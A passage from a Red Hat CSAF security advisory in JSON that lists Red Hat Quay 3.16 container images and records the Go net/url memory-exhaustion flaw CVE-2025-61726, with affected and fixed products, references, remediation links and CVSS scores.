        "product_reference": "registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.16"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le as a component of Red Hat Quay 3.16",
          "product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le"
        },
        "product_reference": "registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
        "relates_to_product_reference": "Red Hat Quay 3.16"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x as a component of Red Hat Quay 3.16",
          "product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x"
        },
        "product_reference": "registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
        "relates_to_product_reference": "Red Hat Quay 3.16"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64 as a component of Red Hat Quay 3.16",
          "product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.16"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64 as a component of Red Hat Quay 3.16",
          "product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.16"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le as a component of Red Hat Quay 3.16",
          "product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le"
        },
        "product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
        "relates_to_product_reference": "Red Hat Quay 3.16"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x as a component of Red Hat Quay 3.16",
          "product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x"
        },
        "product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
        "relates_to_product_reference": "Red Hat Quay 3.16"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64 as a component of Red Hat Quay 3.16",
          "product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.16"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x as a component of Red Hat Quay 3.16",
          "product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x"
        },
        "product_reference": "registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
        "relates_to_product_reference": "Red Hat Quay 3.16"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64 as a component of Red Hat Quay 3.16",
          "product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.16"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le as a component of Red Hat Quay 3.16",
          "product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        },
        "product_reference": "registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
        "relates_to_product_reference": "Red Hat Quay 3.16"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64 as a component of Red Hat Quay 3.16",
          "product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.16"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64 as a component of Red Hat Quay 3.16",
          "product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64"
        },
        "product_reference": "registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
        "relates_to_product_reference": "Red Hat Quay 3.16"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x as a component of Red Hat Quay 3.16",
          "product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x"
        },
        "product_reference": "registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
        "relates_to_product_reference": "Red Hat Quay 3.16"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le as a component of Red Hat Quay 3.16",
          "product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        },
        "product_reference": "registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le",
        "relates_to_product_reference": "Red Hat Quay 3.16"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2025-61726",
      "cwe": {
        "id": "CWE-770",
        "name": "Allocation of Resources Without Limits or Throttling"
      },
      "discovery_date": "2026-01-28T20:01:42.791305+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2434432"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "golang: net/url: Memory exhaustion in query parameter parsing in net/url",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "To exploit this flaw, an attacker must be able to send a specially crafted HTTP request to an application parsing URL-encoded forms with net/url, specifically a request containing a large number of unique query parameters. The request will cause the application to consume an excessive amount of memory and eventually result in a denial of service, with no impact to confidentiality or integrity. Due to this reason, this vulnerability has been rated with an important severity.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2025-61726"
        },
        {
          "category": "external",
          "summary": "RHBZ#2434432",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434432"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2025-61726",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726"
        },
        {
          "category": "external",
          "summary": "https://go.dev/cl/736712",
          "url": "https://go.dev/cl/736712"
        },
        {
          "category": "external",
          "summary": "https://go.dev/issue/77101",
          "url": "https://go.dev/issue/77101"
        },
        {
          "category": "external",
          "summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
          "url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
        },
        {
          "category": "external",
          "summary": "https://pkg.go.dev/vuln/GO-2026-4341",
          "url": "https://pkg.go.dev/vuln/GO-2026-4341"
        }
      ],
      "release_date": "2026-01-28T19:30:31.215000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        },
        {
          "category": "workaround",
          "details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
